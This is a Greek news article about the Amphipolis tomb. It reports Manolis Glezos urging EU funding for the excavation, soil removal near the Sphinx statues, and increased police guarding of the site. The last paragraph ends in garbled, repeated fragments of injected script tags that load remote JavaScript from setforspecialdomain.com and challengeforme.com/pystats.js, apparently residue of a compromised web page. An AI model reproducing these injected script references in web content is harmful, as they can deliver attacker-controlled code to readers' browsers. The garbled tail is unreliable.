Γλέζος σε Ευρωπαίους: Δώστε χρήματα για την ανασκαφή στην Αμφίπολη

Παρεμβαίνοντας, στην Επιτροπή Πολιτισμού και Παιδείας του Ευρωπαϊκού Κοινοβουλίου, ο Μανώλης Γλέζος αναφέρθηκε στην ανακάλυψη του τύμβου της Αμφίπολης, λέγοντας ότι

η ύπαρξή του είχε επισημανθεί από το 2009, ωστόσο χρειάστηκε να περάσουν πέντε χρόνια μέχρι να ξεκινήσουν οι ανασκαφές, ύστερα από αγώνα των Ελλήνων αρχαιολόγων.

Τόνισε ότι υπάρχουν τρία κοινοτικά ταμεία από τα οποία μπορούν να αντληθούν χρήματα για την εν λόγω ανασκαφή και συμπλήρωσε: «Αν θέλουμε μια Ευρώπη του πολιτισμού, πρέπει να υποστηρίξουμε αυτό το εξαιρετικής σημασίας μνημείο». Και κατέληξε: «Μπορεί το συγκεκριμένο να βρίσκεται στην Ελλάδα, ωστόσο με το ίδιο πάθος θα μιλούσα και για κάθε μνημείο ανάλογης σημασίας που θα βρισκόταν στην Ιταλία, την Ισπανία ή οπουδήποτε αλλού στην Ευρώπη».

Συνεχίζονται οι έρευνες στον τύμβο

Χτες απομακρύνθηκαν, με άκρα προσοχή, χώματα τα οποία βρίσκονταν στο διάκενο και πίσω από τα αγάλματα των Σφιγγών, σε βάθος περίπου δυο μέτρων και σε πλάτος ανάλογο της εισόδου του τάφου. Επίσης, συνεχίστηκε η αφαίρεση πέντε λιθόπλινθων, από την έκτη σειρά του τοίχου σφράγισης, με τη βοήθεια μηχανικού μέσου.

Αίτημα για αύξηση των μέτρων φρούρησης του αρχαίου τάφου

Ο υπουργός Δημόσιας Τάξης Βασίλης Κικίλιας είπε ναι στο αίτημα του Περιφερειάρχη κεντρικής Μακεδονίας Απόστολου Τζιτζικώστας για για αύξηση των μέτρων φρούρησης, τα οποία είναι πλέον πραγματικά πρωτοφανή.

Το έργο των ερευνητών είναι σε κρίσιμη φάση και δεν πρέπει κανείς να πλησιάσει όχι μόνο για να μην ενοχλεί στο έργο τους τους αρχαιολόγους, αλλά και για να μην υπάρξουν φαινόμενα αλλοίωσης των στοιχείων ή ακόμη και κλοπές.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >